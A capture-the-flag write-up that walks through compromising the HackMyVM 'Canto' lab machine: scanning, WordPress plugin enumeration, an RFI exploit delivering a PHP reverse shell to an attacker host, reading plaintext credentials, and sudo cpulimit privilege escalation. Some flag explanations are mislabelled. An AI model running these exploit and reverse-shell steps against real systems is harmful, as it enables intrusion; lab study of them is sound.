Canto Write-Up
Introduction
In this write-up, I will guide you through the steps I took to complete the HackMyVM - Canto CTF challenge. The objective is to gain root access to the target machine by exploiting identified vulnerabilities. Checkout the video here (to be updated).
TL;DR
Reconnaissance
Network/Port Scanning (Nmap)
Command:
nmap -sV -sC -vv -oA canto 172.16.100.9Explanation:
nmap: Tool used to scan network and ports to discover which services are running.-sV: Perform version detection of services.-sC: Scan using default scripts.-oA: Output in filename "canto".172.16.100.9: IP address of Canto VM on my network.
Output:
# Nmap 7.94SVN scan initiated Wed Aug 28 00:02:12 2024 as: nmap -sC -sV -vv -oA canto 172.16.100.9
Nmap scan report for 172.16.100.9
Host is up, received syn-ack (0.024s latency).
Scanned at 2024-08-28 00:02:21 PDT for 12s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKkMLZHCokv5rpKTUUfitgdTSiyieZXC1kqsQS8DEnLgk6x5fOmlzHim2qgiwoJhyEJa7Nj1k3K6pwm5RVxEjEU=
| 256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDR8+o8qabpIHzS2zgBZDxfX0Tm5eWBBstEt5QeYN04+
80/tcp open http syn-ack Apache httpd 2.4.57 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 6.6.1
|_http-title: Canto
|_http-server-header: Apache/2.4.57 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 28 00:02:33 2024 -- 1 IP address (1 host up) scanned in 20.37 secondsFindings:
We see that there is a web server running on port 80.
Let's check out the web server and in the background we can run gobuster to brute force web directories.
Directory Brute-forcing (Gobuster)
Command:
gobuster dir -u http://172.16.100.9 -w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,htmlNote: I have setup an alias to run gobuster inside a docker container.
Alias: alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'
Explanation:
dir: Mode of operation indicating directory/file enumeration.-u http://172.16.100.9: Base URL of the target web server to scan.-w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt: Base URL of the target web server to scan.-x php,txt,html: Search for the PHP, HTML and TXT file extensions.
Output:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.100.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/wp-content (Status: 301) [Size: 317] [--> http://172.16.100.9/wp-content/]
/index.php (Status: 301) [Size: 0] [--> http://172.16.100.9/]
/wp-login.php (Status: 200) [Size: 4735]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 318] [--> http://172.16.100.9/wp-includes/]
/readme.html (Status: 200) [Size: 7409]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 315] [--> http://172.16.100.9/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/wp-signup.php (Status: 302) [Size: 0] [--> http://172.16.100.9/wp-login.php?action=register]
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1273832 / 1273833 (100.00%)
===============================================================
Finished
===============================================================Findings:
The directories show that the web server is running Wordpress.
Enumerating WordPress (wpscan)
Command:
wpscan --url http://172.16.100.9/ --detection-mode aggressive --enumerate u,vt,tt,vp --plugins-detection aggressiveExplanation:
--url http://172.16.100.9/: Do all simple enumeration (-U -S -G -P -r -o -n -i).--detection-mode aggressive: IP of the target samba server to enumerate.--enumerate u,vt,tt,vp:--plugins-detection aggressive:
Output:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://172.16.100.9/ [172.16.100.9]
[+] Started: Wed Aug 28 07:14:02 2024
Interesting Finding(s):
[+] XML-RPC seems to be enabled: http://172.16.100.9/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://172.16.100.9/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://172.16.100.9/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://172.16.100.9/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
Fingerprinting the version - Time: 00:00:12 <==========================================================================> (702 / 702) 100.00% Time: 00:00:12
[i] The WordPress version could not be detected.
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:15 <=========================================================================> (7343 / 7343) 100.00% Time: 00:00:15
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] canto
| Location: http://172.16.100.9/wp-content/plugins/canto/
| Last Updated: 2024-07-17T04:18:00.000Z
| Readme: http://172.16.100.9/wp-content/plugins/canto/readme.txt
| [!] The version is out of date, the latest version is 3.0.9
|
| Found By: Known Locations (Aggressive Detection)
| - http://172.16.100.9/wp-content/plugins/canto/, status: 200
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: Canto <= 3.0.8 - Unauthenticated Blind SSRF
| References:
| - https://wpscan.com/vulnerability/29c89cc9-ad9f-4086-a762-8896eba031c6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28976
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28977
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28978
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24063
| - https://gist.github.com/p4nk4jv/87aebd999ce4b28063943480e95fd9e0
|
| [!] Title: Canto < 3.0.5 - Unauthenticated Remote File Inclusion
| Fixed in: 3.0.5
| References:
| - https://wpscan.com/vulnerability/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3452
|
| [!] Title: Canto < 3.0.7 - Unauthenticated RCE
| Fixed in: 3.0.7
| References:
| - https://wpscan.com/vulnerability/1595af73-6f97-4bc9-9cb2-14a55daaa2d4
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25096
| - https://patchstack.com/database/vulnerability/canto/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability
|
| [!] Title: Canto < 3.0.9 - Unauthenticated Remote File Inclusion
| Fixed in: 3.0.9
| References:
| - https://wpscan.com/vulnerability/3ea53721-bdf6-4203-b6bc-2565d6283159
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4936
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/95a68ae0-36da-499b-a09d-4c91db8aa338
|
| Version: 3.0.4 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.16.100.9/wp-content/plugins/canto/readme.txt
| Confirmed By: Composer File (Aggressive Detection)
| - http://172.16.100.9/wp-content/plugins/canto/package.json, Match: '3.0.4'
[+] Enumerating Vulnerable Themes (via Aggressive Methods)
Checking Known Locations - Time: 00:00:02 <===========================================================================> (652 / 652) 100.00% Time: 00:00:02
[i] No themes Found.
[+] Enumerating Timthumbs (via Aggressive Methods)
Checking Known Locations - Time: 00:00:05 <=========================================================================> (2568 / 2568) 100.00% Time: 00:00:05
[i] No Timthumbs Found.
[+] Enumerating Users (via Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <=============================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] erik
| Found By: Wp Json Api (Aggressive Detection)
| - http://172.16.100.9/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 23
[+] Finished: Wed Aug 28 07:14:50 2024
[+] Requests Done: 11900
[+] Cached Requests: 10
[+] Data Sent: 3.196 MB
[+] Data Received: 43.609 MB
[+] Memory used: 396.051 MB
[+] Elapsed time: 00:00:47Findings:
A user erik was found.
A vulnerable plugin canto was found which allows Remote File Inclusion and Remote Command Execution.
Visiting Web Page (Port 80)
This is a normal landing page with no special features. There is no extra information in the source code.
Exploiting The Vulnerability
Finding Exploit File
Let's search the ExploitDB to look for an exploit of the vulnerable plugin.
Command:
searchsploit cantoOutput:
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC) | windows/dos/45095.py
Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) | multiple/webapps/49189.txt
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE) | php/webapps/51826.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------We will use the 3rd exploit as that is the one that is relevant in our case.
Get the path of the exploit and copy it to your current directory.
Command:
searchsploit -x php/webapps/51826.py
cp /usr/share/exploitdb/exploits/php/webapps/51826.py .Output:
Exploit: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/51826
Path: /usr/share/exploitdb/exploits/php/webapps/51826.py
Codes: N/A
Verified: False
File Type: <missing file package>Running The Exploit
Let's understand how the exploit works.
Command:
python3 51826.pyOutput:
usage: 51826.py [-h] -u URL [-s SHELL] -LHOST LOCAL_HOST [-LPORT LOCAL_PORT] [-c COMMAND] [-NC_PORT NC_PORT]
Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452
options:
-h, --help show this help message and exit
-u URL, --url URL Vulnerable URL
-s SHELL, --shell SHELL
Local file for web shell
-LHOST LOCAL_HOST, --local_host LOCAL_HOST
Local web server IP
-LPORT LOCAL_PORT, --local_port LOCAL_PORT
Local web server port
-c COMMAND, --command COMMAND
Command to execute on the target
-NC_PORT NC_PORT, --nc_port NC_PORT
Listener port for netcat
Examples:
- Check the vulnerability
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33
- Execute a command
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'
- Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php
usage: 51826.py [-h] -u URL [-s SHELL] -LHOST LOCAL_HOST [-LPORT LOCAL_PORT] [-c COMMAND] [-NC_PORT NC_PORT]
Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452
options:
-h, --help show this help message and exit
-u URL, --url URL Vulnerable URL
-s SHELL, --shell SHELL
Local file for web shell
-LHOST LOCAL_HOST, --local_host LOCAL_HOST
Local web server IP
-LPORT LOCAL_PORT, --local_port LOCAL_PORT
Local web server port
-c COMMAND, --command COMMAND
Command to execute on the target
-NC_PORT NC_PORT, --nc_port NC_PORT
Listener port for netcat
Examples:
- Check the vulnerability
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33
- Execute a command
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'
- Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.phpI made a copy of the exploit file so that I can directly copy the commands given in the example.
cp 51826.py CVE-2023-3452.pyWe can give a PHP Reverse Shell file as an argument to the exploit. So let's do that.
Download the reverse shell from https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php.
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.phpMake the necessary changes in the code as shown.
Now, our exploit is ready with the reverse shell. We start our listener.
Command:
nc -lvnp 9000Now we exploit.
Command:
python3 CVE-2023-3452.py -u http://172.16.100.9 -LHOST 172.16.5.10 -s php-reverse-shell.phpOutput in listener:
First thing we do, is upgrade the shell.
python3 -c 'import pty;pty.spawn("/bin/bash")';
User (erik) Access
During our WordPress enumeration we had found an user erik. On checking out his /home/erik directory we find a notes directory that has some files in it:
This means we have to find that backups folder. So we search for a backups in the file system.
Command:
find / -name *backups* -type d 2>/dev/nullExplanation:
find /: Thefindcommand, used to search for files and directories. The/indicates that the search should start from the root directory and include all directories and subdirectories under it.-name *backups*: Match the pattern*backups*.-type d: Restricts the search to directories only.2>/dev/null: This part redirects error messages to/dev/null.
Output:
find / -name *backups* -type d 2>/dev/null
/snap/core22/1439/var/backups
/snap/core22/1564/var/backups
/var/backups
/var/wordpress/backupsFindings:
The last directory /var/wordpress/backups is the one we will checkout first because that seems like the most relevant.
On checking out this directory we find a text file with the credentials of erik.
Command:
cd /var/wordpress/backups
ls -lash
cat 12052024.txtOutput:
cat 12052024.txt
------------------------------------
| Users | Password |
------------|----------------------|
| erik | th1sIsTheP3ssw0rd! |
------------------------------------Now that we have the password for the erik user, we can now try SSH.
Command:
Output:
Read the user.txt file to get the flag:
cat user.txtPrivilege Escalation
Let's checkout the sudo permissions we have for erik. Command:
sudo -lOutput:
Matching Defaults entries for erik on canto:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User erik may run the following commands on canto:
(ALL : ALL) NOPASSWD: /usr/bin/cpulimitFindings:
We see that we can run the program /usr/bin/cpulimit with sudo permissions.
On checking GTFOBins we see that there is an entry for the cpulimit program and we can use it to elevate privileges.
Command:
sudo cpulimit -l 100 -f /bin/shOutput:
And thus we have root.
And finally, we can read the root flag:
cat /root/root.txtLast updated